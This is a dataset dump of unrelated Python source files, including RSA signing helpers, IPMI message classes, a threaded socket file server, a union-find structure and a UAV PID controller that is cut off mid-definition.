index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
993,400 | 088c3bd4457e4b2265c0d150090a5ac5b79c0957 | #!/usr/bin/python
# coding=utf-8
import base64
from Crypto import Random
from Crypto.Hash import SHA
from Crypto.Signature import PKCS1_v1_5 as Signature_pkcs1_v1_5
from Crypto.PublicKey import RSA
from typing import Dict, Any
def key_generation():
    """Generate a fresh 2048-bit RSA key pair.

    Returns:
        dict with PEM-encoded ``private_pem`` and ``public_pem`` bytes.
    """
    # Pseudo-random source required by the (Py)Crypto key generator.
    rng = Random.new().read
    keypair = RSA.generate(2048, rng)
    return {
        'private_pem': keypair.exportKey(),
        'public_pem': keypair.publickey().exportKey(),
    }
def signature_generation(trade_message: str, private_key: str) -> str:
    """Sign *trade_message* with a PEM-encoded RSA private key.

    Uses PKCS#1 v1.5 over a SHA-1 digest; the raw signature is returned
    base64-encoded as text.
    """
    signing_key = RSA.importKey(private_key)
    message_digest = SHA.new(trade_message.encode())
    raw_signature = Signature_pkcs1_v1_5.new(signing_key).sign(message_digest)
    return base64.b64encode(raw_signature).decode()
def signature_verify(trade_record: Dict[str, Any]) -> bool:
    """Verify a trade record's signature.

    The signed message is the concatenation of sender, recipient and
    amount; the record's ``sender`` field doubles as the PEM public key.
    """
    public_key = RSA.importKey(trade_record['sender'])
    verifier = Signature_pkcs1_v1_5.new(public_key)
    # Rebuild exactly the message that signature_generation signed.
    message = str(trade_record['sender']) + str(trade_record['recipient']) + str(trade_record['amount'])
    message_digest = SHA.new(message.encode())
    # The stored signature is base64 text; decode it back to raw bytes.
    raw_signature = base64.b64decode(trade_record['signature'].encode())
    return verifier.verify(message_digest, raw_signature)
|
def add(a, b):
    """Return the sum of *a* and *b* (any types supporting ``+``)."""
    return a + b
add(2, 2)  # result (4) is discarded -- likely a REPL/notebook leftover
2**100 + 2**101  # value also discarded; Python ints are arbitrary precision
|
993,402 | 6bd13f4360cf18dd38fa591631e93e469eefd9f9 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2019-10-18 12:29
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds two optional profile-picture image fields to the `live` model.
    # NOTE(review): upload_to='' stores uploads directly under MEDIA_ROOT --
    # confirm that flat layout is intended.
    dependencies = [
        ('live', '0004_auto_20191018_1058'),
    ]
    operations = [
        migrations.AddField(
            model_name='live',
            name='manager_profile_pic',
            field=models.ImageField(blank=True, null=True, upload_to=''),
        ),
        migrations.AddField(
            model_name='live',
            name='owner_profile_pic',
            field=models.ImageField(blank=True, null=True, upload_to=''),
        ),
    ]
|
993,403 | 7fdffc9500bbc00e8a101f253f2c863caa2537a4 | #
# Copyright (c) 2020, Hyve Design Solutions Corporation.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Hyve Design Solutions Corporation nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY HYVE DESIGN SOLUTIONS CORPORATION AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# HYVE DESIGN SOLUTIONS CORPORATION OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from .. util.exception import PyMesgExcept, PyMesgCCExcept
import struct
__all__ = [
'IPMI_Message',
'IPMI_Raw',
'ipmi_app',
'ipmi_chassis',
'ipmi_se',
'ipmi_storage',
'ipmi_transport',
]
class IPMI_Message:
    """One IPMI request/response pair: NetFn, CMD, optional request data."""

    def __init__(self, netfn, cmd, req_data=None, lun=0):
        self.netfn = netfn
        self.cmd = cmd
        self.req_data = req_data
        self.lun = lun
        self.payload_type = 0

    @staticmethod
    def dump_tuple(t1):
        """Render a tuple as '(..)' hex text; '' when t1 is not a tuple.

        ints are formatted as bare hex, bytes as space-separated 02x pairs.
        """
        if type(t1) is not tuple:
            return ''
        parts = []
        for item in t1:
            if type(item) is bytes:
                parts.append(' '.join('{0:02x}'.format(b) for b in item))
            else:
                parts.append('{0:x}'.format(item))
        return '(' + ', '.join(parts) + ')'

    def unpack(self, rsp, fmt=None):
        """Validate a response tuple (netfn, cmd, cc, rsp_data) and decode it.

        Raises PyMesgExcept on NetFn/CMD mismatch or data-length mismatch and
        PyMesgCCExcept on a non-zero completion code. With fmt=None the raw
        response data is returned; otherwise it is struct-unpacked.
        """
        if rsp[0] != self.netfn + 1:
            raise PyMesgExcept('Invalid NetFn {0:02x}h in the response.'.format(rsp[0]))
        if rsp[1] != self.cmd:
            raise PyMesgExcept('Invalid CMD {0:02x}h in the response.'.format(rsp[1]))
        cc, rsp_data = rsp[2:]
        # Raw messages bypass completion-code checking: caller gets [cc, *data].
        if isinstance(self, IPMI_Raw):
            out = [cc]
            if rsp_data is not None:
                out.extend(rsp_data)
            return out
        if cc != 0:
            raise PyMesgCCExcept(self.netfn, self.cmd, cc)
        if fmt is None:
            return rsp_data  # caller asked for the raw payload
        expected = struct.calcsize(fmt)
        if rsp_data is None:  # fmt given, but no payload came back
            raise PyMesgExcept('Unexpected empty response data: NetFn={0:02X}h, CMD={1:02X}h. Expected {2}.'.format(self.netfn, self.cmd, expected))
        if expected != len(rsp_data):
            raise PyMesgExcept('Invalid response data length: NetFn={0:02X}h, CMD={1:02X}h. Expected {2}, but returned {3}.'.format(self.netfn, self.cmd, expected, len(rsp_data)))
        return struct.unpack(fmt, rsp_data)
class IPMI_Raw(IPMI_Message):
    """Raw IPMI message built from a flat [netfn, cmd, data...] byte list."""

    def __init__(self, req, lun=0):
        # Everything after netfn and cmd is the request payload, if any.
        payload = bytes(req[2:]) if len(req) > 2 else None
        super(IPMI_Raw, self).__init__(req[0], req[1], payload, lun)

    def unpack(self, rsp):
        """Decode a raw response tuple; returns [cc, *data] via the base class."""
        return super(IPMI_Raw, self).unpack(rsp)
|
993,404 | 1035246cd9facbc2f7172899158a981e9dafce93 | from pyglet.media import Player, ManagedSoundPlayer
import pyglet
def play_background_music():
    """Start looping background music at 90% volume; any failure is ignored."""
    try:
        music_player = Player()
        music_player.eos_action = Player.EOS_LOOP
        music_player.volume = 0.9
        music_player.queue(pyglet.resource.media('data/music/music.ogg'))
        music_player.play()
    except Exception:
        pass  # audio is optional -- keep running without it
def play_shoot():
    """Play the shooting sound effect at 40% volume."""
    _play_sound('data/shoot.ogg', volume=0.4)
def play_explode():
    """Play the explosion sound effect at full volume."""
    _play_sound('data/explode.ogg')
def _play_sound(filename, volume=1.0):
try:
player = ManagedSoundPlayer()
player.queue(pyglet.resource.media(filename))
player.volume = volume
player.play()
except Exception:
pass # Do nothing
|
993,405 | 2bb451a804c24b2d08a5443148057b02ad7cf76e | from google.appengine.ext import ndb
class CrashReportGroup(ndb.Model):
    """One crash-report bucket per Android package name.

    The entity's key string id is the package name; ``_pre_put_hook``
    mirrors it into ``package_name`` so it can be queried directly.
    """
    created_at = ndb.DateTimeProperty(auto_now_add=True)  # first time the group was stored
    latest_crash_date = ndb.DateTimeProperty()  # not set in this module -- presumably updated by callers
    package_name = ndb.StringProperty()  # copy of the key's string id (see _pre_put_hook)
    @classmethod
    def get_group(cls, package_name):
        # Idempotent lookup-or-create keyed by the package name.
        return cls.get_or_insert(package_name)
    def report_count(self):
        # Count of CrashReport entities stored as children of this group.
        return CrashReport.query(ancestor=self.key).count()
    def _pre_put_hook(self):
        # Keep the indexed property in sync with the key id on every put.
        self.package_name = self.key.string_id()
class CrashReport(ndb.Model):
    """A single crash report.

    Field names mirror an Android crash-reporter payload (ACRA-like --
    TODO confirm); most free-form fields are unindexed TextProperty,
    while fields used for filtering are indexed StringProperty.
    """
    created_at = ndb.DateTimeProperty(auto_now_add=True)  # server-side insertion time
    android_version = ndb.StringProperty()
    app_version_code = ndb.StringProperty()
    app_version_name = ndb.StringProperty()
    available_mem_size = ndb.StringProperty()
    brand = ndb.TextProperty()
    build = ndb.TextProperty()
    crash_configuration = ndb.TextProperty()
    device_features = ndb.TextProperty()
    display = ndb.TextProperty()
    environment = ndb.TextProperty()
    file_path = ndb.TextProperty()
    initial_configuration = ndb.TextProperty()
    installation_id = ndb.TextProperty()
    package_name = ndb.StringProperty()  # indexed: used by for_package()
    model = ndb.StringProperty()
    product = ndb.TextProperty()
    report_id = ndb.TextProperty()
    settings_secure = ndb.TextProperty()
    settings_system = ndb.TextProperty()
    shared_preferences = ndb.TextProperty()
    stack_trace = ndb.TextProperty()
    stack_summary = ndb.StringProperty()
    total_mem_size = ndb.TextProperty()
    user_app_start_date = ndb.DateTimeProperty()
    user_crash_date = ndb.DateTimeProperty()
    @classmethod
    def get_all(cls):
        # Fetch every crash report; no ordering and no paging.
        query = cls.query()
        return query.fetch()
    @classmethod
    def for_package(cls, package_name):
        # All reports for one package, newest first.
        query = cls.query(cls.package_name == package_name)
        query = query.order(- cls.created_at)
        return query.fetch()
|
class Solution(object):
    def findTheDifference(self, s, t):
        """Return the single character by which strings *s* and *t* differ.

        One string is a permutation of the other plus exactly one extra
        character; the difference of summed code points isolates it, and
        abs() makes the argument order irrelevant.
        """
        delta = sum(map(ord, s)) - sum(map(ord, t))
        return chr(abs(delta))
|
993,407 | e144d96a39b47566e3267af887182d0881bf93ee | #------------- SAMPLE THREADED SERVER ---------------
# Similar threading code can be found here:
# Python Network Programming Cookbook -- Chapter - 2
# Python Software Foundation: http://docs.python.org/2/library/socketserver.html
import socket
import threading
import SocketServer
import time
import random
import sys
import os
thread_counter = 0
# define a class to store the attributes of the files
class Files(object):
    # Plain record describing one servable file. These class-level defaults
    # are overwritten per instance by getList(), so instances do not share
    # state in practice.
    name = None        # base file name
    full_path = None   # directory + name as one path string
    size = None        # size in bytes (os.path.getsize)
    type = None        # label sent to clients: "viedo" (sic), "music" or "picture"
#creat a function to return a list of all the files
def getList():
List_of_files = []
curruent_path = os.getcwd()
file_found = False
response = ''
# loop through all the files in the current directory and create a Files objects and append to List_of_files
for files in os.listdir(curruent_path):
new_file = Files()
new_file.name = files
new_file.full_path = curruent_path + "\\" + files
new_file.size = os.path.getsize(curruent_path + "\\" + files)
fileName, fileExtension = os.path.splitext(new_file.full_path)
# tyeo if set for the file depending on its extension
if (fileExtension == '.mov'):
new_file.type = "viedo"
List_of_files.append(new_file)
elif (fileExtension == '.mp3'):
new_file.type = "music"
List_of_files.append(new_file)
elif (fileExtension == '.jpg'):
new_file.type = "picture"
List_of_files.append(new_file)
return List_of_files
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
    # Handles one client connection per thread. Speaks a tiny line protocol:
    # LIST, READ,<name>, WRITE,<name>,<size>, BYE.
    def handle(self):
        global thread_counter
        # NOTE(review): thread_counter is read/written from multiple threads
        # with no lock -- the increments/decrements can race.
        thread_counter += 1
        cur_thread = threading.current_thread() # identify current thread
        thread_name = cur_thread.name # get thread-number in python
        print '\nServer Thread %s receives request: preparing response ' % thread_name
        # while loop to keep the connection alive untill user quits
        while (True):
            # NOTE(review): recv(1024) assumes one whole command per read;
            # TCP gives no such framing guarantee.
            data = self.request.recv(1024)
            data = data.strip()
            if(data != ''):
                if(data.startswith('LIST')):
                    print "\nLIST Command From %s" % thread_name
                    response = ""
                    # get list of files using the fucntion define above
                    List_of_files=getList()
                    for files in List_of_files:
                        # prepare the response
                        response = response + str(files.type)+ "\t " + str(files.name) + "\t size: " + str(files.size) + " bytes\n"
                    if(response == ""):
                        # send the response using request.sendall
                        self.request.sendall("There is no files in the directory")
                    else:
                        self.request.sendall(response)
                        response = ""
                    print "LIST Task Done for %s" % thread_name
                elif(data.startswith('READ')):
                    #get file list
                    List_of_files=getList()
                    if(len(data.split(',')) == 2):
                        filename = data.split(',')[1]
                        file_found = False
                        #loop through the list to check if the file exist
                        for files in List_of_files:
                            if(files.name == filename):
                                file_found = True
                                #send the file size to the client for error handling
                                self.request.sendall(str(files.size))
                                #change the directoy just in case
                                # NOTE(review): chdir is process-wide, so this
                                # can race with other handler threads.
                                os.chdir(files.full_path[:len(files.full_path) - len(files.name)])
                                print "\nREAD Command From %s" %thread_name
                                print "Sending " + str(filename) + "to %s" %thread_name
                                # open the file in read byte mode for transfer
                                f1 = open(files.name, 'rb')
                                for line in f1:
                                    #send each line of the file using a for loop
                                    self.request.sendall(line)
                                # close the file after transfer
                                f1.close()
                        if(file_found == False):
                            #if file is not found, send error to the client for handling
                            response = "ERROR: could not find the file in the server"
                            self.request.sendall(response)
                    else:
                        #if received file name is broken, send error back to the client
                        response = "ERROR: missing file name"
                        self.request.sendall(response)
                elif(data.startswith('WRITE')):
                    # NOTE(review): malformed WRITE commands (missing fields)
                    # raise IndexError/ValueError here and kill the thread.
                    filename = str(data.split(',')[1])
                    filesize = int(data.split(',')[2])
                    print "Receiving: " + str(filename) + " from %s" % thread_name
                    amount_received = 0
                    f1 = open(filename,'wb')
                    while(amount_received < filesize):
                        # try to receive the file, if connection closes suddenly, except block will run
                        try:
                            mess = self.request.recv(64)
                            if mess:
                                #print '\nServer Thread recevied %s' % mess
                                # write to the file each line received
                                f1.write(mess)
                                amount_received += len(mess)
                                print "AR: " + str(amount_received) + " size: " + str(filesize)
                            else:
                                f1.close()
                                break
                        except:
                            # close and delete the file if anything goes wrong.
                            f1.close()
                            os.remove(f1.name)
                            break
                    # NOTE(review): on the success path f1 is never closed
                    # before the acknowledgement below.
                    if(amount_received == filesize):
                        print "Done Receiving"
                        self.request.sendall("From Server: Recevied File: " +str(filename))
                elif(data == "BYE"):
                    # if bye is received, then break out of the while loop to end class
                    break;
        # at the end of class, decrease thread counter
        thread_counter -= 1
        print "" + str(thread_counter)
        if(thread_counter == 0):
            return
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    # ThreadingMixIn makes TCPServer spawn one thread per incoming request.
    pass
if __name__ == "__main__":
    quit_server = False
    # Port 0 means to select an arbitrary unused port
    HOST, PORT = "localhost", 10000
    print "\nStart Threaded-Server on PORT %s " % PORT
    server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
    ip, port = server.server_address
    # Start a thread with the server -- that thread will then start one
    # more thread for each request
    server_thread = threading.Thread(target=server.serve_forever)
    # Terminate the server when the main thread terminates
    # by setting daemon to True
    server_thread.daemon = True
    server_thread.start()
    print "Main Server using thread %s " % server_thread.name
    while True:
        # using while loop and raw_input to allow admin to quit the server
        # NOTE(review): the prompt says "quit" but only the exact string
        # "QUIT" is accepted.
        command = raw_input("enter quit to exit server: \n")
        if(command == "QUIT"):
            if(thread_counter ==0):
                # if no connections the server closes by server.shutdown and quit()
                print 'Main server thread shutting down the server and terminating'
                server.shutdown()
                quit()
            else:
                print 'Waiting for threads to finish...'
                while(thread_counter !=0):
                    # if there are connection, the admin can still force quit the server
                    force_comment = raw_input("Type FORCEQUIT to type abruptly. \n")
                    if(force_comment == "FORCEQUIT"):
                        print 'Bye'
                        os._exit(0)
                quit_server = True
                quit()
|
993,408 | 010ef5befba3fed29deb531db312f233eb22f4cc | import sys
import numpy as np
def inputs(func=lambda x: x, sep=None, maxsplit=-1):
return map(func, sys.stdin.readline().split(sep=sep, maxsplit=maxsplit))
def input_row(n: int, type=int, *args, **kwargs):
    """Read one stdin line and return its fields as a 1-D numpy array of *type*.

    The default previously was ``np.int``, an alias removed in NumPy 1.24
    (its access now raises AttributeError at import time); the builtin
    ``int`` is the documented drop-in replacement.

    NOTE: *n* is currently unused -- the whole line is consumed.
    """
    return np.fromiter(inputs(type, *args, **kwargs), dtype=type)
def input_2d(nrows: int, ncols: int, type=int, *args, **kwargs):
    """Read an (nrows, ncols) array of *type*, one row per stdin line.

    The default dtype is the builtin ``int``: the former default ``np.int``
    was removed in NumPy 1.24 and now raises AttributeError.
    """
    data = np.zeros((nrows, ncols), dtype=type)
    for i in range(nrows):
        data[i, :] = input_row(ncols, type, *args, **kwargs)
    return data
class IntAddition (object):
    """The abelian group of integers under addition.

    Supplies the operations UnionFind needs from its potential group.
    """

    def operate(self, a, b):
        # Group operation: addition.
        return a + b

    @property
    def identity(self):
        # Additive identity element.
        return 0

    def cancel(self, a, b):
        # Apply the inverse of *b* to *a* (subtraction).
        return a - b

    def invert(self, a):
        # Additive inverse.
        return -a

    def accumulate(self, a, count):
        # *count*-fold repetition of the operation: a + a + ... = a * count.
        return a * count
class UnionFindNode (object):
    """A single element of the weighted union-find forest."""

    # __slots__ keeps per-node memory small; these trees can hold many nodes.
    __slots__ = [
        'parent_index',
        'size',
        'difference_from_parent'
    ]

    def __init__(self, index : int, potential_identity):
        # A new node starts as a singleton root: it is its own parent,
        # has size 1, and the identity potential difference to itself.
        self.parent_index = index
        self.size = 1
        self.difference_from_parent = potential_identity
class UnionFind (object):
    '''Weighted union-find (disjoint-set) forest.

    Each node stores a potential difference to its parent, valued in an
    abelian group (``potential_abelian``, integer addition by default),
    enabling queries of the relative potential between connected elements.
    '''
    def __init__(
            self,
            num_nodes=0,
            potential_abelian=IntAddition()):
        # NOTE(review): the default argument is one shared IntAddition
        # instance; it is stateless, so the sharing is harmless here.
        self.nodes = []
        self.op = potential_abelian
        self.extend(num_nodes)
    def append(self):
        # Add one new singleton node.
        self.nodes.append(
            UnionFindNode(len(self.nodes), self.op.identity)
        )
    def extend(self, num_nodes):
        # Add num_nodes new singleton nodes.
        self.nodes.extend(
            UnionFindNode(i, self.op.identity)
            for i in range(num_nodes)
        )
    def root(self, index : int):
        # Find the root of *index* with path halving: each visited node is
        # re-pointed at its grandparent, folding the parent's potential
        # difference into its own so the stored weights stay consistent.
        x = self.nodes[index]
        while x.parent_index != index:
            parent = self.nodes[x.parent_index]
            x.difference_from_parent = self.op.operate(
                x.difference_from_parent,
                parent.difference_from_parent
            )
            index = x.parent_index = parent.parent_index
            x = self.nodes[index]
        return index
    def difference_from_root_to(self, index : int):
        # Accumulate the potential from *index* up to its root without
        # mutating the tree (callers run root() first to keep paths short).
        x = self.nodes[index]
        potential = x.difference_from_parent
        while x.parent_index != index:
            parent = self.nodes[x.parent_index]
            potential = self.op.operate(
                potential,
                parent.difference_from_parent
            )
            index = x.parent_index
            x = self.nodes[index]
        return potential
    def size(self, index : int):
        # Number of elements in the set containing *index*.
        return self.nodes[self.root(index)].size
    def difference(self, x, y):
        # Potential of y relative to x; raises if they are not connected.
        if not self.issame(x, y):
            raise RuntimeError('x と y は同じ集合に属していません。')
        return self.op.cancel(
            self.difference_from_root_to(y),
            self.difference_from_root_to(x)
        )
    def unite(self, x, y, difference=None) -> bool:
        # Merge the sets of x and y under the constraint
        # potential(y) - potential(x) == difference (identity by default).
        # Returns False only when x and y were already connected with a
        # conflicting difference; union is by size.
        if difference is None:
            difference = self.op.identity
        x, px = self.root(x), self.difference_from_root_to(x)
        y, py = self.root(y), self.difference_from_root_to(y)
        if x == y:
            # Already connected: just verify consistency.
            return difference == self.op.cancel(py, px)
        # Re-express the constraint as the difference between the two roots.
        difference = self.op.cancel(difference, py)
        difference = self.op.operate(difference, px)
        if self.size(x) < self.size(y):
            # Attach the smaller tree under the larger; invert the sign
            # because the roles of x and y swap.
            x, y = y, x
            difference = self.op.invert(difference)
        x_node = self.nodes[x]
        y_node = self.nodes[y]
        x_node.size += y_node.size
        y_node.parent_index = x
        y_node.difference_from_parent = difference
        return True
    def issame(self, x, y):
        # True when x and y belong to the same set.
        return self.root(x) == self.root(y)
# Driver: N elements and M constraints "value[R] - value[L] = D"; print
# whether all constraints are mutually consistent.
N, M = inputs(int)
uf = UnionFind(num_nodes=N)
valid = True
for i in range(M):
    L, R, D = inputs(int)
    L -= 1  # input indices are 1-based
    R -= 1
    # NOTE: `and` short-circuits, so after the first conflict the remaining
    # constraints are read but no longer added to the structure.
    valid = valid and uf.unite(L, R, D)
print('Yes' if valid else 'No')
|
993,409 | b8f73e92c6da8dcb15419d1224db99fcfaa47821 |
import pyfx
import numpy as np
import ffmpeg
def video_dimensions(filename):
    """Return (width, height) of the first video stream in *filename*.

    Uses ffprobe via ffmpeg-python; raises if no video stream exists
    (subscripting None).
    """
    probe = ffmpeg.probe(filename)
    video_stream = None
    for stream in probe['streams']:
        if stream['codec_type'] == 'video':
            video_stream = stream
            break
    width = int(video_stream['width'])
    height = int(video_stream['height'])
    return width, height
def video_to_array(filename):
    """Load a whole video into a 4-D uint8 array [frame, height, width, RGB]."""
    width, height = video_dimensions(filename)
    # Decode the entire file to raw RGB24 bytes on stdout.
    raw_bytes, _ = (
        ffmpeg
        .input(filename)
        .output('pipe:', format='rawvideo', pix_fmt='rgb24')
        .run(capture_stdout=True)
    )
    frames = np.frombuffer(raw_bytes, np.uint8)
    # -1 lets numpy infer the frame count from the buffer length.
    return frames.reshape([-1, height, width, 3])
def to_video(img_set,output_file):
    """Write *img_set* frames to *output_file* as a video. Not implemented."""
    # TODO: the dead string below is a template (ffmpeg-python style) for the
    # intended decode -> transform -> encode pipe implementation.
    pass
    """
    process1 = (
        ffmpeg
        .input(in_filename)
        .output('pipe:', format='rawvideo', pix_fmt='rgb24')
        .run_async(pipe_stdout=True)
    )
    process2 = (
        ffmpeg
        .input('pipe:', format='rawvideo', pix_fmt='rgb24', s='{}x{}'.format(width, height))
        .output(out_filename, pix_fmt='yuv420p')
        .overwrite_output()
        .run_async(pipe_stdin=True)
    )
    while True:
        in_bytes = process1.stdout.read(width * height * 3)
        if not in_bytes:
            break
        in_frame = (
            np
            .frombuffer(in_bytes, np.uint8)
            .reshape([height, width, 3])
        )
        out_frame = in_frame * 0.3
        process2.stdin.write(
            frame
            .astype(np.uint8)
            .tobytes()
        )
    process2.stdin.close()
    process1.wait()
    process2.wait()
    """
|
993,410 | db5b6c6efd36f75afae76bb166ed5015f5983b0b | # Set of function to solve the PDE for a result until we meet the tolerance at all points
from function import func
def solve(nodes, tol):
    """Relax the PDE stencil until the largest change is within *tol*.

    Performs Jacobi-style sweeps (all new values computed from the old
    state before any assignment), mutates each node's T in place, prints
    the sweep number, and gives up after 10000 sweeps.

    Returns the same *nodes* list.
    """
    max_change = tol + 1  # force at least one sweep
    sweeps = 0
    while (max_change > tol) and sweeps < 10000:
        sweeps += 1
        # One full sweep: evaluate the stencil for every node.
        updated = [
            func(node,
                 node.neighbours["left"], node.neighbours["right"],
                 node.neighbours["top"], node.neighbours["bottom"])
            for node in nodes
        ]
        # Measure convergence before committing the new values.
        max_change = calcDel(updated, nodes)
        for idx, value in enumerate(updated):
            nodes[idx].T = value
        print(sweeps)
    return nodes
def calcDel(newValues, nodes):
    """Return the largest absolute change between newValues and the nodes' T."""
    largest = 0
    for new_value, node in zip(newValues, nodes):
        delta = abs(new_value - node.T)
        if delta > largest:
            largest = delta
    return largest
993,411 | 4bf735fd7c0058b0b34374a61ecc2a6a2cc9b93b | import requests
# Base URL of the local Flask REST API under test.
Base = "http://127.0.0.1:5000/"
# Sample items to load into the /mall resource.
moc_data = [{"name":"potato", "discount":0.7, "id":1},
            {"name":"tomato", "discount":0.1, "id":2},
            {"name":"ququmba", "discount":0.2, "id":3}]
# Create the three items (PUT /mall/0..2) and print each JSON response.
for i in range(len(moc_data)):
    response = requests.put(Base + "mall/" + str(i), moc_data[i])
    print(response.json())
input()  # pause so the server state can be inspected before the delete
# Delete the first item, then fetch another to confirm the rest survive.
response = requests.delete(Base + "mall/0")
print(response)
input()
response = requests.get(Base + "mall/1")
print(response.json())
def isprime(n):
    """Primality test by trial division over 6k +/- 1 candidates."""
    if n <= 1:
        return False
    if n <= 3:
        return True  # 2 and 3
    if n % 2 == 0 or n % 3 == 0:
        return False
    # Any remaining factor must have the form 6k - 1 or 6k + 1.
    candidate = 5
    while candidate * candidate <= n:
        if n % candidate == 0 or n % (candidate + 2) == 0:
            return False
        candidate += 6
    return True
def gen_primes(n):
    """Return the list of all primes strictly below *n*.

    Trial division against previously found primes, stopping once the
    divisor exceeds sqrt(num): any composite has a prime factor no larger
    than its square root, so the original full scan was wasted work.
    """
    prime_list = []
    for num in range(2, n):
        is_prime = True
        for prime in prime_list:
            if prime * prime > num:
                break  # no divisor found up to sqrt(num): num is prime
            if num % prime == 0:
                is_prime = False
                break
        if is_prime:
            prime_list.append(num)
    return prime_list
def is_written(n):
    """Test Goldbach's other conjecture for *n*.

    Returns True iff n = p + 2*k*k for some prime p < n and integer k >= 1.
    """
    for p in gen_primes(n):
        k = 1
        while k * k < n:
            if p + 2 * k * k == n:
                return True
            k += 1
    return False
# Search upward for an odd composite that is NOT a prime plus twice a square
# (Goldbach's other conjecture; Project Euler 46 style).
odd_composite = 33
while True:
    # NOTE(review): `odd_composite % 10000` is truthy for almost every value,
    # so this prints nearly every candidate -- `% 10000 == 0` (a progress
    # marker) was probably intended.
    if odd_composite % 10000:
        print(odd_composite)
    # Skip odd primes to land on the next odd composite.
    while isprime(odd_composite):
        odd_composite += 2
    if not is_written(odd_composite):
        print('{} cannot be written as a sum of a prime and two times a square'.format(odd_composite))
    # NOTE(review): the loop keeps searching forever even after printing a
    # counterexample -- a `break` here may have been intended.
    odd_composite += 2
|
993,413 | 3b6c745062ab6e21c18d1024fdcb20ccca7606b7 | #!/usr/bin/env python
# coding: utf-8
import numpy as np
import os, sys, time, copy, yaml
from .utils import *
# Controller base
# Controller base
class UAV_pid():
    """Base controller: vehicle parameters plus quad thrust mixing.

    Every physical parameter can be supplied as a keyword argument; missing
    ones fall back to a default, reported on stdout when ``debug=True``.
    Attribute names (``gravity_`` etc.) are unchanged for subclass callers.
    """

    def __init__(self, *args, **kwargs):
        # Debug flag first: it controls whether fallback messages print.
        self.flag_debug = kwargs.get('debug', False)
        # (kwarg name, attribute, default, message when falling back).
        # The original repeated this if/else block eight times; the messages
        # for motorRotorInertia/motorTimeConstant were copy-paste errors
        # ("torque coefficient") and are corrected here.
        param_specs = [
            ('gravity', 'gravity_', 9.81,
             "Did not get the gravity from the params, defaulting to 9.81 m/s^2"),
            ('vehicleMass', 'vehicleMass_', 1.0,
             "Did not get the vehicle mass from the params, defaulting to 1.0 kg"),
            ('vehicleInertia', 'vehicleInertia_', np.array([0.0049, 0.0049, 0.0069]),
             "Did not get the PID inertia from the params, defaulting to [0.0049, 0.0049. 0.0069] kg m^2"),
            ('momentArm', 'momentArm_', 0.08,
             "Did not get the PID moment arm from the params, defaulting to 0.08 m"),
            ('thrustCoeff', 'thrustCoeff_', 1.91e-6,
             "Did not get the PID thrust coefficient from the params, defaulting to 1.91e-6 N/(rad/s)^2"),
            ('torqueCoeff', 'torqueCoeff_', 2.6e-7,
             "Did not get the PID torque coefficient from the params, defaulting to 2.6e-7 Nm/(rad/s)^2"),
            ('motorRotorInertia', 'motorRotorInertia_', 6.62e-6,
             "Did not get the motor rotor inertia from the params, defaulting to 6.62e-6 kg m^2"),
            ('motorTimeConstant', 'motorTimeConstant_', 0.02,
             "Did not get the motor time constant from the params, defaulting to 0.02 s"),
        ]
        for key, attr, default, message in param_specs:
            if key in kwargs:
                setattr(self, attr, kwargs[key])
            else:
                if self.flag_debug:
                    print(message)
                setattr(self, attr, default)

    def thrust_mixing(self, angAccCommand, thrustCommand):
        """Map an angular-acceleration command plus collective thrust to the
        four signed propeller speed commands.

        Parameters
        ----------
        angAccCommand : length-3 array of body angular accelerations.
        thrustCommand : scalar collective thrust command.

        Returns
        -------
        np.ndarray of 4 signed motor speed commands (sign carries the
        direction of the squared-speed solution).
        """
        # Desired body moments (I * alpha) and negated collective thrust.
        momentThrust = np.array([
            self.vehicleInertia_[0] * angAccCommand[0],
            self.vehicleInertia_[1] * angAccCommand[1],
            self.vehicleInertia_[2] * angAccCommand[2],
            -thrustCommand])
        # Closed-form inverse of the control-allocation matrix G1.
        # (The original also computed an unused G2z and pre-filled invG1 with
        # zeros that were immediately overwritten; both removed.)
        G1xy = self.thrustCoeff_ * self.momentArm_
        invG1xy = 1. / (4. * G1xy)
        invG1z = 1. / (4. * self.torqueCoeff_)
        invG1t = 1. / (4. * self.thrustCoeff_)
        invG1 = np.array([
            [ invG1xy,  invG1xy, -invG1z, -invG1t],
            [-invG1xy,  invG1xy,  invG1z, -invG1t],
            [-invG1xy, -invG1xy, -invG1z, -invG1t],
            [ invG1xy, -invG1xy,  invG1z, -invG1t]
        ])
        # Signed, squared motor speeds from the moment/thrust demand.
        motorSpeedsSquared = invG1.dot(momentThrust)
        # sqrt of the magnitude, re-applying the sign element-wise.
        return np.copysign(np.sqrt(np.fabs(motorSpeedsSquared)), motorSpeedsSquared)
# PID angular rate controller
class UAV_pid_angular_rate(UAV_pid):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# PID Controller Gains (roll / pitch / yaw)
if 'propGain' in kwargs:
self.propGain_ = kwargs['propGain']
else:
if self.flag_debug:
